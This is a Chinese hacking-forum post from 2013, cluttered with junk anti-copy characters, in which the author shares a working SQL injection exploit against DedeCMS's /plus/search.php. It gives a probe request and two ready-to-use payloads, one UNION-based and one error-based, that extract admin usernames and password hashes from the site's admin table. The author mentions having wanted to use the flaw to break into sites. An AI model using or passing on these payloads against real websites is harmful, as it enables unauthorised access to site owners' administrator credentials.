转载不加作者名的没JJ
4 ^5 j/ h, F5 d e6 S6 Q3 o- B. v+ r' p1 D3 o( z' n. H# w4 K1 C, p; _
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
8 z4 V/ h) s5 k& `5 q/ @" r+ Z6 A, M
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。8 w# Q# v9 q- `7 `3 Q- s7 `3 C. G
4 H8 K4 o! d+ \5 R, Q8 {( c* D( o
我一般是这样测试的:. ]; c: B3 L! w3 B4 F
7 V5 d% Z* ~- W y2 A9 N
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
2 X3 ?. M& q& [! x% w) l3 h4 F5 W/ s/ Q6 `( m5 [# G
转载不加作者名的没JJ
, X# W+ N1 `* R+ y7 n
7 z1 G, }' G5 k8 m作者:鬼哥; F- K6 B# A6 f4 o0 i$ J
! p& G% g4 l( A 2 Q8 g Z& }* g0 M
( c b& z# d% w4 @
看结果如果提示) a0 ~2 _: s+ r8 \6 i8 R' h0 ^( c5 N
c& s5 I* h/ K. W* m0 N" x1 q# ?Safe Alert: Request Error step 2 !# K- ^% o$ b# A p& t! T+ d6 s
* Q" D$ m6 e3 p3 h# o, a8 U那么直接用下面的exp" A! c! v0 y, e+ a& V/ c
. d7 z) B+ v6 K. R
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a8 q0 ^$ @4 I& {% M; F
5 W0 w2 C4 O: l$ P5 {) @( V* o$ s. w0 d2 n, s/ E; V) q/ s
看结果如果提示
. S, x. L% e& R+ z8 Z6 N! ?, P+ j: ?) X0 \* [; h
Safe Alert: Request Error step 1 !
4 `" {& e, c' A- [& f# N) S- T; C- L# t/ J. @4 U3 q
那么直接用下面的exp
5 j/ |: g- e0 N. O) v0 j9 m- ~' o; K* h1 z' F
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a8 m- [6 h9 n+ V: ?) K
1 p( G3 m6 Z5 l% [1 L1 ]2 L, H$ F
% t8 O7 L' v+ A+ b如果正常显示证明漏洞不存在了。5 q8 f. J% z% V" |9 t( l) G* O
: p" _) S3 T% r$ N5 B& ?+ m转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对